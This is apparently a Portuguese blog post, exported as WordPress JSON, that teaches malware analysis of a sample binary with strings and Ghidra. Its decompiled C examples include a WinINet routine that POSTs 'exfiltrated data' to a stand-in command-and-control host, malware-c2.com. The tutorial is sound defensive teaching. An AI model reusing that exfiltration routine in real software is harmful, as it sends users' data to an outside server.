{"id":21959,"date":"2025-02-18T13:05:18","date_gmt":"2025-02-18T16:05:18","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=21959"},"modified":"2025-02-23T19:25:17","modified_gmt":"2025-02-23T22:25:17","slug":"forense-digital-com-linux-tecnicas-praticas-parte-3","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2025\/02\/exploits\/forense-digital-com-linux-tecnicas-praticas-parte-3\/","title":{"rendered":"Forense Digital com Linux &#8211; T\u00e9cnicas Pr\u00e1ticas &#8211; Parte 3"},"content":{"rendered":"\n<div class=\"ds-markdown ds-markdown--block\">\n<p style=\"text-align: justify;\">A an\u00e1lise de um bin\u00e1rio malicioso, como o <code>malware.9999.exe<\/code>, \u00e9 uma etapa crucial para entender seu comportamento e funcionalidades. Duas ferramentas essenciais para essa an\u00e1lise s\u00e3o o <strong><code>strings<\/code><\/strong> e o <strong>Ghidra<\/strong>. Abaixo, vamos explorar exemplos pr\u00e1ticos de como utilizar essas ferramentas para analisar o bin\u00e1rio.<\/p>\n<p>\u00a0<\/p>\n<p><strong>1. An\u00e1lise com <code><strong>strings<\/strong><\/code><\/strong><\/p>\n<p style=\"text-align: justify;\">O comando <code>strings<\/code> extrai sequ\u00eancias de caracteres leg\u00edveis de um bin\u00e1rio, o que pode revelar informa\u00e7\u00f5es \u00fateis, como URLs, comandos, mensagens de erro ou outras strings embutidas no c\u00f3digo.<\/p>\n<p>\u00a0<\/p>\n<p><strong>1.1 Executando o <code>strings<\/code> no Bin\u00e1rio<\/strong><\/p>\n<p><strong>Comando:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>strings output\/malware.9999.exe<\/pre>\n<\/div>\n<p><strong>Sa\u00edda no Shell:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>http:\/\/malware-c2.com\/update\nhttp:\/\/malware-c2.com\/data\nGetProcAddress\nLoadLibraryA\nCreateFileA\nWriteFile\nReadFile\nExitProcess\nUSER32.dll\nKERNEL32.dll\n\"Senha: %s\"\n\"Erro ao conectar ao servidor\"\n\"Executando payload...\"<\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p style=\"text-align: justify;\"><strong>URLs<\/strong>: <code>http:\/\/malware-c2.com\/update<\/code> e <code>http:\/\/malware-c2.com\/data<\/code> podem indicar servidores de comando e controle (C2).<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>Fun\u00e7\u00f5es da API do Windows<\/strong>: <code>GetProcAddress<\/code>, <code>LoadLibraryA<\/code>, <code>CreateFileA<\/code>, etc., sugerem que o malware interage com o sistema operacional.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>Mensagens embutidas<\/strong>: Strings como <code>\"Senha: %s\"<\/code> e <code>\"Erro ao conectar ao servidor\"<\/code> podem indicar funcionalidades espec\u00edficas do malware.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>1.2 Filtrando Strings Relevantes<\/strong><\/p>\n<p>Voc\u00ea pode usar o comando <code>grep<\/code> para filtrar strings espec\u00edficas, como URLs ou palavras-chave.<\/p>\n<p><strong>Comando:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>strings output\/malware.9999.exe <span class=\"token operator\">|<\/span> <span class=\"token function\">grep<\/span> <span class=\"token string\">\"http:\/\/\"<\/span><\/pre>\n<\/div>\n<p><strong>Sa\u00edda no Shell:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>http:\/\/malware-c2.com\/update\nhttp:\/\/malware-c2.com\/data<\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p>As URLs filtradas confirmam a comunica\u00e7\u00e3o do malware com servidores C2.<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<p>\u00a0<\/p>\n<p><strong>2. An\u00e1lise com Ghidra<\/strong><\/p>\n<div class=\"ds-markdown ds-markdown--block\">\n<p style=\"text-align: justify;\">O <strong>Ghidra<\/strong> \u00e9 uma ferramenta de engenharia reversa desenvolvida pela NSA. Ele permite descompilar bin\u00e1rios e analisar seu c\u00f3digo-fonte, mesmo que esteja em linguagem de m\u00e1quina.<\/p>\n<p>\u00a0<\/p>\n<p><strong>2.1 Importando o Bin\u00e1rio no Ghidra<\/strong><\/p>\n<ul>\n<li>\n<p>Inicie o Ghidra:<\/p>\n<div class=\"md-code-block\">\n<pre>ghidraRun<\/pre>\n<\/div>\n<\/li>\n<li>\n<p>Crie um novo projeto:<\/p>\n<ul>\n<li>\n<p>V\u00e1 em <strong>File &gt; New Project<\/strong>.<\/p>\n<\/li>\n<li>\n<p>Escolha <strong>Non-Shared Project<\/strong> e nomeie o projeto (por exemplo, <code>Malware_Analysis<\/code>).<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>Importe o bin\u00e1rio:<\/p>\n<ul>\n<li>\n<p>V\u00e1 em <strong>File &gt; Import File<\/strong>.<\/p>\n<\/li>\n<li>\n<p>Selecione o arquivo <code>malware.9999.exe<\/code>.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>Analise o bin\u00e1rio:<\/p>\n<ul>\n<li>\n<p>Clique em <strong>OK<\/strong> para iniciar a an\u00e1lise autom\u00e1tica.<\/p>\n<\/li>\n<li>\n<p>O Ghidra ir\u00e1 descompilar o bin\u00e1rio e exibir o c\u00f3digo-fonte aproximado.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"ds-markdown ds-markdown--block\">\n<h3>\u00a0<\/h3>\n<p><strong>2.2 Analisando o C\u00f3digo Descompilado<\/strong><\/p>\n<p><strong>2.2.1 Identificando Fun\u00e7\u00f5es Principais<\/strong><\/p>\n<ul>\n<li>\n<p>No painel <strong>Symbol Tree<\/strong>, expanda a se\u00e7\u00e3o <strong>Functions<\/strong>.<\/p>\n<\/li>\n<li>\n<p>Procure por fun\u00e7\u00f5es suspeitas, como <code>main<\/code>, <code>WinMain<\/code>, ou fun\u00e7\u00f5es com nomes relacionados a comunica\u00e7\u00e3o de rede (<code>send<\/code>, <code>recv<\/code>).<\/p>\n<\/li>\n<\/ul>\n<p><strong>Exemplo de fun\u00e7\u00e3o descompilada:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token keyword\">void<\/span> <span class=\"token function\">FUN_00401000<\/span><span class=\"token punctuation\">(<\/span><span class=\"token keyword\">void<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span>\n  HANDLE hFile<span class=\"token punctuation\">;<\/span>\n  <span class=\"token keyword\">char<\/span> buffer<span class=\"token punctuation\">[<\/span><span class=\"token number\">256<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">;<\/span>\n  DWORD bytesWritten<span class=\"token punctuation\">;<\/span>\n\n  hFile <span class=\"token operator\">=<\/span> <span class=\"token function\">CreateFileA<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">\"C:\\\\malware_output.txt\"<\/span><span class=\"token punctuation\">,<\/span> GENERIC_WRITE<span class=\"token punctuation\">,<\/span> <span class=\"token number\">0<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <br \/>CREATE_ALWAYS<span class=\"token punctuation\">,<\/span> FILE_ATTRIBUTE_NORMAL<span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n  <span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span>hFile <span class=\"token operator\">!=<\/span> INVALID_HANDLE_VALUE<span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span>\n    <span class=\"token function\">strcpy<\/span><span class=\"token punctuation\">(<\/span>buffer<span class=\"token punctuation\">,<\/span> <span class=\"token string\">\"Dados exfiltrados pelo malware\"<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n    <span class=\"token function\">WriteFile<\/span><span class=\"token punctuation\">(<\/span>hFile<span class=\"token punctuation\">,<\/span> buffer<span class=\"token punctuation\">,<\/span> <span class=\"token function\">strlen<\/span><span class=\"token punctuation\">(<\/span>buffer<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token operator\">&amp;<\/span>bytesWritten<span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n    <span class=\"token function\">CloseHandle<\/span><span class=\"token punctuation\">(<\/span>hFile<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n  <span class=\"token punctuation\">}<\/span>\n  <span class=\"token keyword\">return<\/span><span class=\"token punctuation\">;<\/span>\n<span class=\"token punctuation\">}<\/span><\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p>A fun\u00e7\u00e3o <code>FUN_00401000<\/code> cria um arquivo chamado <code>malware_output.txt<\/code> e escreve dados nele.<\/p>\n<\/li>\n<li>\n<p>Isso sugere que o malware pode estar exfiltrando informa\u00e7\u00f5es para o sistema de arquivos.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>2.2.2 Identificando Chamadas de API<\/strong><\/p>\n<ul>\n<li>\n<p>No painel <strong>Decompile<\/strong>, procure por chamadas de API suspeitas, como <code>CreateFileA<\/code>, <code>WriteFile<\/code>, <code>InternetOpenA<\/code>, <code>InternetReadFile<\/code>, etc.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Exemplo de Chamada de API:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>HINTERNET hInternet <span class=\"token operator\">=<\/span> <span class=\"token function\">InternetOpenA<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">\"User-Agent\"<\/span><span class=\"token punctuation\">,<\/span> <br \/>INTERNET_OPEN_TYPE_DIRECT<span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token number\">0<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n<span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span>hInternet <span class=\"token operator\">!=<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span>\n  HINTERNET hConnect <span class=\"token operator\">=<\/span> <span class=\"token function\">InternetConnectA<\/span><span class=\"token punctuation\">(<\/span>hInternet<span class=\"token punctuation\">,<\/span> <span class=\"token string\">\"malware-c2.com\"<\/span><span class=\"token punctuation\">,<\/span> <br \/>INTERNET_DEFAULT_HTTP_PORT<span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> INTERNET_SERVICE_HTTP<span class=\"token punctuation\">,<\/span> <span class=\"token number\">0<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token number\">0<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n  <span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span>hConnect <span class=\"token operator\">!=<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span>\n    HINTERNET hRequest <span class=\"token operator\">=<\/span> <span class=\"token function\">HttpOpenRequestA<\/span><span class=\"token punctuation\">(<\/span>hConnect<span class=\"token punctuation\">,<\/span> <span class=\"token string\">\"POST\"<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string\">\"\/data\"<\/span><span class=\"token punctuation\">,<\/span> <br \/><span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token number\">0<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token number\">0<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n    <span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span>hRequest <span class=\"token operator\">!=<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span>\n      <span class=\"token function\">HttpSendRequestA<\/span><span class=\"token punctuation\">(<\/span>hRequest<span class=\"token punctuation\">,<\/span> <span class=\"token constant\">NULL<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token number\">0<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string\">\"Dados exfiltrados\"<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token function\">strlen<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">\"Dados exfiltrados\"<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span>\n    <span class=\"token punctuation\">}<\/span>\n  <span class=\"token punctuation\">}<\/span>\n<span class=\"token punctuation\">}<br \/><br \/><\/span><\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p>O c\u00f3digo faz uma requisi\u00e7\u00e3o HTTP POST para <code>malware-c2.com\/data<\/code>.<\/p>\n<\/li>\n<li>\n<p>Isso confirma que o malware est\u00e1 se comunicando com um servidor C2 para exfiltrar dados.<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<div class=\"ds-markdown ds-markdown--block\"><br \/>\n<p><strong>2.3 Identificando Strings no Ghidra<\/strong><\/p>\n<ul>\n<li>\n<p>No painel <strong>Defined Strings<\/strong>, procure por strings relevantes, como URLs, mensagens de erro ou comandos.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Exemplo de Strings Encontradas:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>http:\/\/malware-c2.com\/update\nhttp:\/\/malware-c2.com\/data\n\"Senha: %s\"\n\"Erro ao conectar ao servidor\"<\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p>As URLs confirmam a comunica\u00e7\u00e3o com servidores C2.<\/p>\n<\/li>\n<li>\n<p>As mensagens sugerem funcionalidades espec\u00edficas, como coleta de senhas.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<\/div>\n<div class=\"ds-markdown ds-markdown--block\">\n<p><strong>3. Documentando as descobertas<\/strong><\/p>\n<p>Ap\u00f3s a an\u00e1lise, documente todas as descobertas, incluindo:<\/p>\n<ul>\n<li>\n<p><strong>Strings relevantes<\/strong>: URLs, comandos, mensagens.<\/p>\n<\/li>\n<li>\n<p><strong>Fun\u00e7\u00f5es suspeitas<\/strong>: C\u00f3digo relacionado \u00e0 exfiltra\u00e7\u00e3o de dados, comunica\u00e7\u00e3o de rede, etc.<\/p>\n<\/li>\n<li>\n<p><strong>Chamadas de API<\/strong>: Fun\u00e7\u00f5es do Windows API usadas pelo malware.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<\/div>\n<div class=\"ds-markdown ds-markdown--block\">\n<p><strong>Conclus\u00e3o<\/strong><\/p>\n<p style=\"text-align: justify;\">A an\u00e1lise de um bin\u00e1rio malicioso com <code>strings<\/code> e Ghidra revela informa\u00e7\u00f5es valiosas sobre seu comportamento e funcionalidades. Enquanto o <code>strings<\/code> fornece uma vis\u00e3o r\u00e1pida das strings embutidas, o Ghidra permite uma an\u00e1lise profunda do c\u00f3digo-fonte, incluindo chamadas de API e l\u00f3gica do programa.<\/p>\n<p style=\"text-align: justify;\">Combinando essas ferramentas, voc\u00ea pode entender como o malware opera, identificar seus objetivos e tomar medidas para mitigar seus efeitos. Para an\u00e1lises mais avan\u00e7adas, considere explorar outras ferramentas de engenharia reversa, como <strong>IDA Pro<\/strong> ou <strong>Radare2<\/strong>.<\/p>\n<\/div>\n<p>\u00a0<\/p>\n<p style=\"text-align: justify;\">Aqui est\u00e3o algumas refer\u00eancias bibliogr\u00e1ficas e recursos \u00fateis sobre <strong>Ghidra<\/strong> e o comando <strong>strings <\/strong>apresentados, que s\u00e3o ferramentas importantes para an\u00e1lise de bin\u00e1rios e engenharia reversa:<\/p>\n<p>\u00a0<\/p>\n<p><strong>1. Ghidra<\/strong><\/p>\n<p style=\"text-align: justify;\">Ghidra \u00e9 uma ferramenta de engenharia reversa desenvolvida pela NSA (National Security Agency) e disponibilizada como software de c\u00f3digo aberto. Ele \u00e9 usado para analisar bin\u00e1rios, descompilar c\u00f3digo e entender o funcionamento de programas.<\/p>\n<p><strong>Refer\u00eancias:<\/strong><\/p>\n<ul>\n<li>\n<p><strong>Site Oficial:<\/strong><br \/><a href=\"https:\/\/ghidra-sre.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/ghidra-sre.org\/<\/a><\/p>\n<ul>\n<li>\n<p>Aqui voc\u00ea encontra o download da ferramenta, documenta\u00e7\u00e3o oficial e tutoriais.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p><strong>Documenta\u00e7\u00e3o Oficial:<\/strong><br \/>A documenta\u00e7\u00e3o do Ghidra est\u00e1 inclu\u00edda na instala\u00e7\u00e3o da ferramenta e tamb\u00e9m est\u00e1 dispon\u00edvel online. Ela cobre desde a instala\u00e7\u00e3o at\u00e9 o uso avan\u00e7ado de funcionalidades.<\/p>\n<\/li>\n<li>\n<p><strong>Livros:<\/strong><\/p>\n<ul>\n<li>\n<p><strong>&#8220;Ghidra Software Reverse Engineering for Beginners&#8221;<\/strong> por A. P. David<br \/>Este livro \u00e9 uma introdu\u00e7\u00e3o pr\u00e1tica ao Ghidra, ideal para quem est\u00e1 come\u00e7ando com engenharia reversa.<\/p>\n<\/li>\n<li>\n<p><strong>&#8220;The Ghidra Book: The Definitive Guide&#8221;<\/strong> por Chris Eagle e Kara Nance<br \/>Um guia abrangente e detalhado sobre o Ghidra, escrito por especialistas em engenharia reversa.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li>\n<p><strong>Tutoriais Online:<\/strong><\/p>\n<ul>\n<li>\n<p><a href=\"https:\/\/www.youtube.com\/results?search_query=ghidra+tutorial\" target=\"_blank\" rel=\"noopener noreferrer\">Ghidra Tutorials no YouTube<\/a><br \/>H\u00e1 v\u00e1rios tutoriais em v\u00eddeo que cobrem desde o b\u00e1sico at\u00e9 t\u00e9cnicas avan\u00e7adas.<\/p>\n<\/li>\n<li>\n<p><a href=\"https:\/\/github.com\/NationalSecurityAgency\/ghidra\" target=\"_blank\" rel=\"noopener noreferrer\">Ghidra GitHub Repository<\/a><br \/>O reposit\u00f3rio oficial no GitHub cont\u00e9m o c\u00f3digo-fonte e issues para contribui\u00e7\u00f5es.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>\u00a0<\/h3>\n<p><strong>2. Strings<\/strong><\/p>\n<p style=\"text-align: justify;\">O comando <strong>strings<\/strong> \u00e9 uma ferramenta simples, mas poderosa, usada para extrair sequ\u00eancias de caracteres leg\u00edveis de arquivos bin\u00e1rios. Ele \u00e9 frequentemente usado em an\u00e1lises preliminares de bin\u00e1rios para identificar informa\u00e7\u00f5es como textos, URLs, mensagens de erro, etc.<\/p>\n<p><strong>Refer\u00eancias:<\/strong><\/p>\n<ul>\n<li>\n<p><strong>Man Page do Strings (Linux):<\/strong><br \/>No terminal Linux, voc\u00ea pode acessar o manual do comando <code>strings<\/code> digitando:<\/p>\n<div class=\"md-code-block\">\n<div class=\"md-code-block-banner-wrap\">\n<div class=\"md-code-block-banner\">\u00a0<\/div>\n<\/div>\n<pre><span class=\"token function\">man<\/span> strings<\/pre>\n<\/div>\n<p>Isso fornece uma descri\u00e7\u00e3o detalhada das op\u00e7\u00f5es e funcionalidades do comando.<\/p>\n<\/li>\n<li>\n<p><strong>Livros:<\/strong><\/p>\n<ul>\n<li>\n<p><strong>&#8220;Hacking: The Art of Exploitation&#8221;<\/strong> por Jon Erickson<br \/>Este livro cobre t\u00e9cnicas b\u00e1sicas e avan\u00e7adas de hacking, incluindo o uso de ferramentas como <code>strings<\/code> para an\u00e1lise de bin\u00e1rios.<\/p>\n<\/li>\n<li>\n<p><strong>&#8220;Practical Reverse Engineering&#8221;<\/strong> por Bruce Dang, Alexandre Gazet, Elias Bachaalany<br \/>Um livro focado em engenharia reversa, que discute o uso de ferramentas como <code>strings<\/code> em cen\u00e1rios pr\u00e1ticos.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p><strong>Tutoriais Online:<\/strong><\/p>\n<ul>\n<li>\n<p><a href=\"https:\/\/ioflood.com\/blog\/strings-linux-command\/\" target=\"_blank\" rel=\"noopener noreferrer\">Linux Strings Command Tutorial<\/a><\/p>\n<\/li>\n<li>\n<p>Um guia pr\u00e1tico com exemplos de uso do comando <code>strings<\/code>.<\/p>\n<\/li>\n<li>\n<p><a href=\"https:\/\/reverseengineering.stackexchange.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Using Strings for Binary Analysis<\/a><br \/>F\u00f3runs como o Stack Exchange t\u00eam discuss\u00f5es \u00fateis sobre o uso de <code>strings<\/code> em engenharia reversa.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><strong>3. Integra\u00e7\u00e3o de Ghidra e Strings<\/strong><\/p>\n<p style=\"text-align: justify;\">Em an\u00e1lises de bin\u00e1rios, \u00e9 comum usar o <code>strings<\/code> como uma ferramenta inicial para identificar informa\u00e7\u00f5es relevantes e depois aprofundar a an\u00e1lise com o Ghidra. Por exemplo:<\/p>\n<ul>\n<li>\n<p>Use <code>strings<\/code> para extrair textos e identificar poss\u00edveis fun\u00e7\u00f5es ou mensagens.<\/p>\n<\/li>\n<li>\n<p>Importe o bin\u00e1rio no Ghidra para descompilar o c\u00f3digo e entender a l\u00f3gica do programa.<\/p>\n<\/li>\n<\/ul>\n<p><strong>4. Ferramentas Relacionadas<\/strong><\/p>\n<ul>\n<li>\n<p><strong>Radare2:<\/strong> Outra ferramenta de engenharia reversa que pode ser usada em conjunto com Ghidra.<\/p>\n<\/li>\n<li>\n<p><strong>IDA Pro:<\/strong> Uma alternativa paga ao Ghidra, amplamente usada em engenharia reversa.<\/p>\n<\/li>\n<li>\n<p><strong>Binwalk:<\/strong> Ferramenta para an\u00e1lise de firmware e extra\u00e7\u00e3o de arquivos de bin\u00e1rios.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p>\u00a0<\/p>\n<p>\u00a0<\/p>\n<p>\u00a0<\/p>\n<p>\u00a0<\/p>\n\n\n","protected":false},"excerpt":{"rendered":"<p>A an\u00e1lise de um bin\u00e1rio malicioso, como o malware.9999.exe, \u00e9 uma etapa crucial para entender seu comportamento e funcionalidades. Duas ferramentas essenciais para essa an\u00e1lise s\u00e3o o strings e o Ghidra. Abaixo, vamos explorar exemplos pr\u00e1ticos de como utilizar essas ferramentas para analisar o bin\u00e1rio. \u00a0 1. An\u00e1lise com strings O comando strings extrai sequ\u00eancias [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":21961,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[89,100,21],"tags":[],"class_list":["post-21959","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basico","category-diversos","category-exploits"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21959","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=21959"}],"version-history":[{"count":30,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21959\/revisions"}],"predecessor-version":[{"id":22183,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21959\/revisions\/22183"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/21961"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=21959"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=21959"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=21959"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}